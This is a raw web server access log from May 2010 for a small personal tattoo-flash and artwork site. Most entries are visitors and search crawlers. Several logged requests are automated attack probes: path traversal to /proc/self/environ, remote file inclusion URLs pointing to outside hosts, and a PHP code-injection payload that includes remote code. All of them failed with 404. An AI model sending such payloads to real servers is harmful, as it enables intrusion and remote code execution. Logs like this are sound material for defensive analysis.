204.232.202.236 - - [04/May/2010:13:53:20 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:53:20 -0500] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:53:27 -0500] "GET /logs/access_log.1270857600/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 371 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:53:28 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:53:28 -0500] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:53:30 -0500] "GET /logs/access_log.1270857600/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 371 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:53:30 -0500] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 344 "-""libwww-perl/5.808"
204.232.202.236 - - [04/May/2010:13:53:30 -0500] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
207.46.199.193 - - [04/May/2010:13:56:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [04/May/2010:13:58:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.127.253.75 - - [04/May/2010:14:01:21 -0500] "GET /logs/access_log.1228089600/config.php?path_to_root=http://www.yajiada88.com/hid/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.826"
210.127.253.75 - - [04/May/2010:14:01:22 -0500] "GET /config.php?path_to_root=http://www.yajiada88.com/hid/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.826"
210.127.253.75 - - [04/May/2010:14:01:22 -0500] "GET /logs/config.php?path_to_root=http://www.yajiada88.com/hid/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.826"
99.155.21.140 - - [04/May/2010:14:03:30 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=11&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26sa%3DN%26rls%3Dcom.microsoft:en-us:IE-SearchBox%26tbs%3Disch:1""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:30 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:30 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:30 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:30 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:32 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:32 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 206 10612 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:34 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 206 4044 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
99.155.21.140 - - [04/May/2010:14:03:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
210.127.253.75 - - [04/May/2010:14:04:07 -0500] "GET /logs/access_log.1219968000/config.php?path_to_root=http://www.yajiada88.com/hid/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.826"
218.38.34.19 - - [04/May/2010:14:07:34 -0500] "GET /logs//write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:07:34 -0500] "GET //write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:07:34 -0500] "GET /logs/access_log.1265760000//write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.204.181 - - [04/May/2010:14:07:53 -0500] "GET /logs/access_log.1268438400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [04/May/2010:14:07:58 -0500] "GET /logs/access_log.1244505600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
99.39.2.249 - - [04/May/2010:14:10:31 -0500] "GET /logs/access_log.1213401600//index.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
99.39.2.249 - - [04/May/2010:14:10:31 -0500] "GET //index.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
99.39.2.249 - - [04/May/2010:14:10:31 -0500] "GET /logs//index.php?option=com_extended_registration&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.199.53 - - [04/May/2010:14:11:53 -0500] "GET /logs/access_log.1256601600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [04/May/2010:14:12:12 -0500] "GET /logs/access_log.1272153600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
72.0.16.12 - - [04/May/2010:14:13:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.0.16.12 - - [04/May/2010:14:13:31 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.0.16.12 - - [04/May/2010:14:13:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
67.195.112.180 - - [04/May/2010:14:13:45 -0500] "GET /logs/access_log.1191110400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [04/May/2010:14:15:11 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 1778 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.131.106.31 - - [04/May/2010:14:21:13 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.31 - - [04/May/2010:14:21:15 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 3414 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
67.195.112.180 - - [04/May/2010:14:22:20 -0500] "GET /artwork/furniture.htm HTTP/1.0" 200 1004 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [04/May/2010:14:25:34 -0500] "GET /logs/access_log.1272326400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.54 - - [04/May/2010:14:26:23 -0500] "GET /logs/access_log.1209686400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.242 - - [04/May/2010:14:30:23 -0500] "GET /logs/access_log.1187395200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.34.19 - - [04/May/2010:14:32:05 -0500] "GET /logs//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:32:05 -0500] "GET //setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:32:05 -0500] "GET /logs/access_log.1265760000//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:32:13 -0500] "GET /logs/access_log.1264118400//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
71.239.236.212 - - [04/May/2010:14:33:40 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:40 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:33:47 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:04 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
71.239.236.212 - - [04/May/2010:14:34:05 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MDDC)"
218.38.34.19 - - [04/May/2010:14:34:47 -0500] "GET //setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:34:47 -0500] "GET /logs/access_log.1265760000//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:34:47 -0500] "GET /logs//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [04/May/2010:14:34:48 -0500] "GET /logs/access_log.1264118400//setup.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [04/May/2010:14:40:09 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.164 - - [04/May/2010:14:43:30 -0500] "GET /logs/access_log.1211328000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
173.55.117.253 - - [04/May/2010:14:45:45 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=11&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26tbs%3Disch:1""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
173.55.117.253 - - [04/May/2010:14:45:45 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
173.55.117.253 - - [04/May/2010:14:45:45 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
173.55.117.253 - - [04/May/2010:14:45:45 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
173.55.117.253 - - [04/May/2010:14:45:45 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
173.55.117.253 - - [04/May/2010:14:45:46 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
173.55.117.253 - - [04/May/2010:14:46:18 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
173.55.117.253 - - [04/May/2010:14:46:18 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
173.55.117.253 - - [04/May/2010:14:46:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
77.222.56.62 - - [04/May/2010:14:46:32 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
216.129.119.13 - - [04/May/2010:14:49:02 -0500] "GET /logs/access_log.1238803200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
77.222.56.62 - - [04/May/2010:14:51:07 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:14:51:07 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:14:51:07 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
38.111.147.86 - - [04/May/2010:14:52:20 -0500] "GET /logs/access_log.1182729600 HTTP/1.0" 404 298 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows 98) -"
87.250.255.243 - - [04/May/2010:14:52:20 -0500] "GET /logs/access_log.1270684800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
77.222.56.62 - - [04/May/2010:14:54:46 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:14:54:47 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:14:54:47 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
